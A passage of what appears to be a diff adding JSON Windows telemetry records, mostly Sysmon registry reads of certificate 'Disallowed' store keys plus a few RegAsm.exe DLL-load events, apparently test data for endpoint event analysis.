"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", 
+ "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", + "registry_value": "clr.dll", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "registry_value": "RegAsm.exe", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 